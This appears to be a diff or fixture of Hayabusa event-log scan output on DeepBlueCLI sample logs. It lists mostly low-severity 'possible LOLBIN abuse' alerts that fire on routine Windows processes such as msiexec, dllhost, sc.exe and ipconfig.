+2016-09-03 23:48:23.826 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:46.838 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:48:47.001 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:49:56.148 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1608 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:49:56.315 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding FCF342A8AA47B271C771D0C94D1CA700 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x158c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:49:59.727 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x16ec | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:03.843 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xdb4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:03.998 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 5E2017AA7D1C6A31E9A7DE000332388B E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x4cc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:11.414 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:11.583 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding BA71DC5EB60F0E63B6B2273896748ED0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x728 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:23.151 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1468 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:23.337 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 63DCF5B6F3ADD0E112DCFCDBC9A49554 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x554 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:37.272 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xae8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:51:37.462 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding CE81D9B1345CD9F81599FCA563520F29 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1014 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:52:34.610 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xc3c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:52:34.820 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 03F824F4D05CDB05A799DCD0DF81BAF1 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x910 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:53:22.275 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1028 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:53:22.491 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 4DBAF3FC1CB10E33B65E99A4560027B6 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xb90 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-03 23:53:23.408 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0xefc | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 00:52:11.006 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xfb8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:19:44.532 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x928 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:19:44.676 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" Scan -ScheduleJob -WinTask -RestrictPrivilegesScan -Reinvoke | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0xe20 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:19:44.692 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""c:\program files\windows defender\MpCmdRun.exe"" SignaturesUpdateService -ScheduleJob | Path: C:\Program Files\Windows Defender\MpCmdRun.exe | PID: 0x270 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:21:44.528 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xe88 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:27:33.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xe4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:34:52.733 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0x101c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:34:54.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:14.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-09-04 06:35:14.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2016-09-04 06:35:15.773 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6fc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:16.101 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x514 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:29.507 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:29.601 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:40.667 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xd00 | User: IEUser | LID: 0x60b6f",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:35:46.165 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xe90 | User: IEUser | LID: 0x60b6f,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:36:24.719 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xad4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:36:26.520 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x398 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 06:48:30.867 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -queuereporting | Path: C:\Windows\System32\rundll32.exe | PID: 0x650 | User: IEUser | LID: 0x60b9d",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 07:57:17.289 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x794 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 07:57:39.909 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb68 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 08:03:14.642 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x9d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 08:03:14.751 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xcc0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:04.123 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0x234 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:05.218 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x93c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:05.234 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:05.439 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x958 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:15.400 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xa60 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 22:32:23.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x67c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:37:56.230 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x944 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:37:59.307 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xd64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:39:22.859 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xdcc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-04 23:39:28.137 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x224 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-05 00:10:41.119 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x740 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-05 00:10:41.316 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x44c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:20.120 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0xd98 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:20.122 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\sc.exe start w32time task_started | Path: C:\Windows\System32\sc.exe | PID: 0xfa0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:21.221 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x7a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:21.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0xa7c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 11:13:30.470 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd50 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 12:28:48.887 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0xb94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-15 12:28:49.170 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb64 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
